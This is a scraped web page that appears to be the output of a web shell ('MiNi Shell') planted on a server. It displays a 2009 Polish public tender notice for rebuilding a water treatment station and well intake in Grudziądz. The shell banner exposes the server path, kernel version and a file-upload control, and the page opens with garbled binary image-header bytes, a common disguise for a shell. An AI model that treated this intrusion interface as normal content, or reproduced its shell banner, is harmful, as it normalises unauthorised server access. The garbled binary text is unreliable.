JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090526/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090526/167700-N-2009.html

<p class="kh_header"><b>Grudziądz: Przebudowa Stacji Uzdatniania Wody oraz rozbudowa i przebudowa Ujęcia Wody wraz z infrastrukturą towarzyszącą w Grudziądzu.</b><br>
<b>Numer ogłoszenia: 167700 - 2009; data zamieszczenia: 26.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejskie Wodociągi i Oczyszczalnia Sp. z o.o. , ul. Mickiewicza 28/30, 86-300 Grudziądz, woj. kujawsko-pomorskie, tel. 056 4504901, faks (056) 4504934.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wodociagi.grudziadz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa Stacji Uzdatniania Wody oraz rozbudowa i przebudowa Ujęcia Wody wraz z infrastrukturą towarzyszącą w Grudziądzu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Robota budowlana pn. Przebudowa Stacji Uzdatniania Wody oraz rozbudowa i przebudowa Ujęcia Wody wraz z infrastrukturą towarzyszącą w Grudziądzu.
Zamówienie obejmuje wykonanie robót budowlanych w następującym zakresie: 
Stacja Uzdatniania Wody (zwana w skrócie SUW): wymiana 4 pomp o wydajności 600 m3 i 1000 m3 (pompy dostarcza Zamawiający), wymiana rurociągów technologicznych z rur stalowych na stalowe nierdzewne o średnicach 150 - 600 mm, dostawa i wymiana wszystkich przepustnic ręcznych i z napędem pneumatycznym, montaż urządzeń do dezynfekcji lampami UV  (urządzenia UV dostarcza Zamawiający), montaż przepływomierzy magnetycznych o średnicy  150 mm - 600 mm (przepływomierze dostarcza Zamawiający), dostawa i montaż w komorze reakcji separatora lamella (1 komplet), montaż areatorów kaskadowych (14 kompletów) o wydajności max każdego 125 m3/h (areatory dostarcza Zamawiający), wykonania elementów budowlanych w budynku SUW (renowacja ścian i posadzek:  układanie płytek ceramicznych, malowanie, demontaż pomostów stalowych), wymiana instalacji elektrycznych SUW, modernizacja układu automatyki i sterowania SUW, wraz z kompletem oprogramowania; wykonanie rozruchu SUW.
Ujęcie Wody (zwane w skrócie UW): modernizacja stacji transformatorowej  z 15 kV na 0,4 kV wraz z wykonaniem zasilania sześciu studni głębinowych, wykonania centralnego układu sterowania i pomiarów studni ujęcia wody, wykonanie systemu ekonomicznego zarządzania i sterowania pracą studni ujęcia wody, wykonanie odprowadzenia wód popłucznych do kanalizacji sanitarnej wraz ze zbiornikiem podziemnym  z  PE o pojemności 100 m3.
Szczegółowo przedmiot zamówienia został opisany w Dokumentacji Projektowej oraz specyfikacji technicznej wykonania i odbioru robót budowlanych, stanowiących załączniki nr 7-12 do SIWZ, na które składają się: 1) Projekt architektoniczno-budowlany SUW + UW; 2) Projekt wykonawczy SUW + UW; 3) Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych SUW + UW; 4) Kosztorys ofertowy SUW + UW; 5) Przedmiary robót SUW + UW; 6) Informacja Dotycząca Bezpieczeństwa i Ochrony Zdrowia - Przebudowa Stacji Uzdatniania Wody; 7) Dokumentacja geotechniczna określająca warunki posadowienia projektowanych obiektów Stacji Uzdatniania Wody przy ul. Hallera 79 w Grudziądzu..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.25.21.26-7, 45.23.21.50-8, 45.23.13.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	W niniejszym postępowaniu Zamawiający wymaga wniesienia wadium.
2.	Wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium w wysokości 
250 000 zł (słownie złotych: dwieście pięćdziesiąt tysięcy). 3.Wadium może być wniesione w następujących formach: a) pieniądzu, b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, c) gwarancjach bankowych, d) gwarancjach ubezpieczeniowych, e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity - Dz. U. z 2007 r. Nr 42, poz. 275 z późn. zm.); 4. W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy: a) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib, b) określenie wierzytelności, która ma być zabezpieczona gwarancją, c) kwotę gwarancji, d) termin ważności gwarancji, e) zobowiązanie gwaranta do: zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano: - odmówił podpisania umowy na warunkach określonych w ofercie, lub - nie wniósł zabezpieczenia należytego wykonania umowy, lub - zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
5. Postanowienia pkt X.4. SIWZ stosuje się odpowiednio do poręczeń, określonych w pkt X.3.b) i X.3.e) SIWZ.
6. Wadium wnoszone w pieniądzu należy wpłacić na następujący rachunek Zamawiającego:
Nazwa Zamawiającego:	Miejskie Wodociągi i Oczyszczalnia Sp. z. o.o.
Adres: 				ul. Mickiewicza 28/30, 86-300 Grudziądz
Nr konta: 			91 1160 2202 0000 0000 6088 4611
Kod Swift: 			BIGBPLPWXXX
IBAN: 			PL 91 1160 2202 0000 0000 6088 4611
Bank: 				Bank Millennium
Na  przelewie należy umieścić tytuł postępowania i dopisać: wadium przetargowe. Do oferty należy dołączyć kopię polecenia przelewu.
7. Wadium wnoszone w innych dopuszczonych przez Zamawiającego formach należy złożyć w sposób następujący:
a)	oryginał dokumentu - w kasie Zamawiającego (czynna codziennie oprócz sobót, niedziel i świąt w godz. od 7:30 do 14:30), przy przekazaniu dokumentu osoba go składająca otrzyma odpowiednie potwierdzenie,
b)	kopia dokumentu - w ofercie.
Nie należy załączać oryginału dokumentu wadialnego do oferty.
8. Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert. W wymienionym przypadku dołączenie do oferty kopii polecenia przelewu wystawionego przez Wykonawcę jest warunkiem koniecznym, ale nie wystarczającym do stwierdzenia przez Zamawiającego terminowego wniesienia wadium przez Wykonawcę. Wniesienie wadium będzie skuteczne, jeżeli w podanym terminie znajdzie się na rachunku bankowym Zamawiającego.
9. Wadium musi być wniesione na cały okres związania ofertą. Wniesienie wadium na czas krótszy niż okres związania ofertą Zamawiający będzie traktował tak, jakby wadium nie zostało wniesione.  Wykonawca, który nie wniesie wadium w sposób określony w SIWZ zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.
10. Bieg terminu rozpoczyna się wraz z upływem terminu składania ofert. Wykonawca samodzielnie lub na wniosek Zamawiającego może przedłużyć termin związania ofertą, z tym że Zamawiający może tylko raz, co najmniej na 3 dni przed upływem terminu związania ofertą, zwrócić się do Wykonawców o wyrażenie zgody na przedłużenie tego terminu o oznaczony okres, nie dłuższy jednak niż 60 dni.
11. Zamawiający zwróci niezwłocznie wadium według zasad określonych w art. 46 ust. 1, 2 i 4 ustawy Pzp.
12. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca 
w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictwa, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie
13. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana: 
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; 
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe 
z przyczyn leżących po stronie Wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział Wykonawcy, którzy spełniają następujące warunki: 1. Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 2. Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia; W szczególności Wykonawca musi spełniać  następujące  warunki: 1) doświadczenie zawodowe - wykonanie w okresie ostatnich 5 lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, prace polegające na budowie lub modernizacji przynajmniej jednej stacji uzdatniania wody o wydajności minimum Q śr. = 25 000 m3/dobę, Q godz. = 1 000 m3/h, o wartości nie mniejszej niż 8 000 000 PLN.
Wymaga się by zakres prac wykonanych na tej stacji uzdatniania wody obejmował: 
montaż i spawanie rurociągu ciśnieniowego ze stali nierdzewnej o średnicach  min. 500 mm układanych w galeriach; wykonanie systemu automatyki, sterowania i rozruchu stacji SUW; wykonanie ringu światłowodowego o długości nie mniejszej niż 1,5 km opartego na co najmniej 10 węzłach sieciowych umożliwiających komunikację z lokalnymi sterownikami PLC.  
Zamawiający wymaga, aby wszystkie ww. prace były wykonane na jednym obiekcie SUW + UW; 
2)	potencjał kadrowy:
a)	posiadanie przeciętnego zatrudnienia w okresie ostatnich trzech  lat (2006, 2007, 2008), a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, w wysokości 50 pracowników produkcyjnych w każdym kolejnym roku,
b)	wskazanie do uczestniczenia w wykonaniu niniejszego zamówienia następujących osób wraz z informacjami na temat ich kwalifikacji zawodowych, a także zakresu wykonywanych przez nich czynności: kierownika budowy, który winien posiadać doświadczenia w kierowaniu robotami z zakresu inżynierii sanitarnej, w tym doświadczenia  kierownika robót obiektów technologicznych: przy budowie lub modernizacji obiektów stacji uzdatniania wody o wydajności min. 25 000 m3 na dobę; kierownika robót ogólnobudowlanych; kierownika robót elektrycznych.
Osoby, które będą uczestniczyć w wykonaniu zamówienia muszą  posiadać następujące uprawnienia (wymagane ustawą z dnia 7 lipca 1994 r. Prawo budowlane z  późn. zm), 
kierownik budowy: uprawnienia budowlane do kierowania robotami budowlanymi 
w specjalności instalacyjnej w zakresie sieci, instalacji  wodociągowych 
i kanalizacyjnych bez ograniczeń lub odpowiadające im uprawnienia budowlane wydane na podstawie poprzednio obowiązujących przepisów; przynależność do izby inżynierów budownictwa; wpis do centralnego rejestru prowadzonego przez Głównego Inspektora Nadzoru Budowlanego;
kierownik robót ogólnobudowlanych: uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń lub odpowiadające im uprawnienia budowlane wydane na podstawie poprzednio obowiązujących przepisów; przynależność do izby inżynierów budownictwa; wpis do centralnego rejestru prowadzonego przez Głównego Inspektora Nadzoru Budowlanego
kierownik robót elektrycznych: uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń lub odpowiadające im uprawnienia budowlane wydane na podstawie poprzednio obowiązujących przepisów; przynależność do izby inżynierów budownictwa; wpis do centralnego rejestru prowadzonego przez Głównego Inspektora Nadzoru Budowlanego; świadectwo kwalifikacyjne uprawniające do zajmowania się urządzeniami, instalacją i sieciami na stanowisku dozoru.
3.	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. W szczególności Wykonawca musi wykazać, że:
a)	osiągnął średni obrót z ostatnich 3 pełnych lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - to za ten okres - przynajmniej 20 000 000 PLN i posiada dodatni wynik finansowy  w każdym z 3 lat,
b)	posiadać środki finansowe lub zdolność kredytową w wysokości co najmniej 5 000 000 PLN, 
c)	posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności na sumę ubezpieczenia nie mniejszą niż: 5 000 000 PLN;
4.	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy Pzp.
Zamawiający dokona oceny spełniania warunków na podstawie złożonych oświadczeń i dokumentów opisanych w pkt VIII SIWZ, według formuły spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełniania warunków udziału w postępowaniu Wykonawcy muszą dostarczyć:
1.	Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu 
(z art. 44 w związku z art. 22 ust. 1 ust. Pzp), sporządzone według załączonego wzoru stanowiącego załącznik nr 2 do SIWZ [dotyczy warunku określonego w pkt VII.4.]. 
2.	 Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej,  wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert [dotyczy warunku określonego w pkt VII.1.].
3.	Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub      rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert [dotyczy warunku określonego w pkt VII.4.].
4.	Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert [dotyczy warunku określonego w pkt VII.4.].
5.	Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert [dotyczy warunku określonego w pkt VII.4.].

6.	Wykaz wykonanych robót budowlanych spełniających warunki określone w punkcie VII.2.1). zrealizowanych w ostatnich pięciu latach przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, 
z podaniem ich wartości oraz daty i miejsca wykonania, sporządzony według wzoru stanowiącego załącznik nr 3 do SIWZ. Na każdą robotę budowlaną wskazaną w niniejszym wykazie należy dołączyć dokument potwierdzający (referencje), że inwestycje zostały wykonane należycie [dotyczy warunku określonego w pkt VII.2.1).].
7.	Informacja na temat przeciętnej liczby zatrudnionych pracowników w okresie ostatnich trzech lat, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie [dotyczy warunku określonego w pkt VII.2.2. lit. a]. Zamawiający dopuszcza złożenie rocznych sprawozdań Z-06 - o pracujących, wynagrodzeniach 
i czasie pracy, lub oświadczeń Wykonawcy.
8.	Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w  wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, sporządzony według wzoru stanowiącego załącznik nr 4 do SIWZ [dotyczy warunku określonego w pkt VII.2.2). lit b].
9.	Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia - wyłącznie w przypadku, gdy w wykazie, o którym mowa 
w pkt VIII.8. (punkt powyżej) Wykonawca wskazał osoby, którymi będzie dysponował.
10.	Dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia budowlane oraz zaświadczenia 
o przynależności do Izby Inżynierów Budownictwa [dotyczy warunku określonego 
w pkt VII.2.2). lit. b], tj.: dokument potwierdzający nadanie uprawnień budowlanych, dokument potwierdzający przynależność do Izby Inżynierów Budownictwa, zaświadczenie o wpisie do centralnego rejestru prowadzonego przez Głównego Inspektora Nadzoru Budowlanego (dotyczy osób, które uzyskały uprawnienia po 1 stycznia 1995 r.), świadectwo kwalifikacyjne uprawniające do zajmowania się urządzeniami, instalacjami i sieciami na stanowisku dozoru (dotyczy osoby wskazanej do pełnienia funkcji kierownika robót elektrycznych). 
  Uwaga: W przypadku osób będących obywatelami państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, w celu udokumentowania posiadanych uprawnień przez ww. osoby do oferty należy dołączyć kserokopię decyzji w sprawie nadania uprawnień budowlanych, o których mowa w art. 12a ust. 2 ustawy Prawo budowlane z dnia 7 lipca 1994 r. (dz. U. z r. 2003 Nr 20 poz. 2016 
z późn. zm.) wydawaną przez właściwy organ samorządu zawodowego. 
W przypadku, gdy ww. osoby nie znają języka polskiego wymagane jest, aby Wykonawca zapewnił pełną usługę tłumaczenia na i z języka polskiego.
11.	Bilans oraz rachunek zysków i strat za okres ostatnich 3 lat obrotowych (2006, 2007, 2008), a jeżeli okres prowadzenia działalności jest krótszy - za ten okres, 
a w przypadku Wykonawcy nie zobowiązanego do sporządzania sprawozdania finansowego, należy przedłożyć inne dokumenty określające obroty oraz zobowiązania i należności - za okres ostatnich 3 lat obrotowych (2006, 2007, 2008), a jeżeli okres prowadzenia działalności jest krótszy - za ten okres. Dokumenty  winny być sporządzone i podpisane zgodnie z zasadami ustawy z dnia 29 września 1994 r. o rachunkowości (jednolity tekst - Dz. U. z 2002 r. Nr 76 poz. 694 ze zmianami) [dotyczy warunku określonego w pkt VII.3. lit. a].
12.	Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert [dotyczy warunku określonego 
w pkt VII.3. lit. b].
13.	Polisa, a przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na sumę ubezpieczenia nie mniejszą niż: 5 000 000 PLN [dotyczy warunku określonego w pkt VII.3.lit.c]. Polisa (lub inny dokument) musi być ważna co najmniej na dzień składania ofert. W przypadku złożenia przez Wykonawców dokumentów zawierających dane w innych walutach niż PLN, Zamawiający jako kurs przeliczeniowy waluty (z waluty obcej na PLN) przyjmie średni kurs NBP  
z dnia wszczęcia postępowania.
14.	Pełnomocnictwo do reprezentowania Wykonawcy, o ile ofertę składa pełnomocnik. 
15.	Dokumenty mogą być złożone w oryginale lub kserokopii potwierdzonej za zgodność z oryginałem przez Wykonawcę.
16.	Dokumenty złożonych pełnomocnictw mogą być złożone w oryginale lub kopii poświadczonej za zgodność z oryginałem.
17.	Stosownie do treści §2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. (Dz. U. Nr 87, poz. 605 z późn. zm.)  w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane:
1)	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentów, o których mowa w pkt VIII.2 
i VIII.3. SIWZ,  składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b)	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie 
w całości wykonania decyzji właściwego organu,
c)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
2)	Dokumenty, o których mowa powyżej w pkt 1) lit. a i c, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. Dokument, o którym mowa powyżej w pkt 1) lit. b, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;
3)	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa w pkt VIII.2, VIII.3., VIII.4. i VIII.5 SIWZ, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego, odpowiednio kraju pochodzenia osoby, lub kraju w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Przepis pkt 2 powyżej stosuje się odpowiednio..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.bip.wodociagi.grudziadz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejskie Wodociągi i Oczyszczalnia spółka z o. o. 
ul. Mickiewicza 28/30
86-300 Grudziądz, pokój nr 8.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.06.2009 godzina 14:00, miejsce: Miejskie Wodociągi i Oczyszczalnia spółka z o. o. 
ul. Mickiewicza 28/30
86-300 Grudziądz, sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com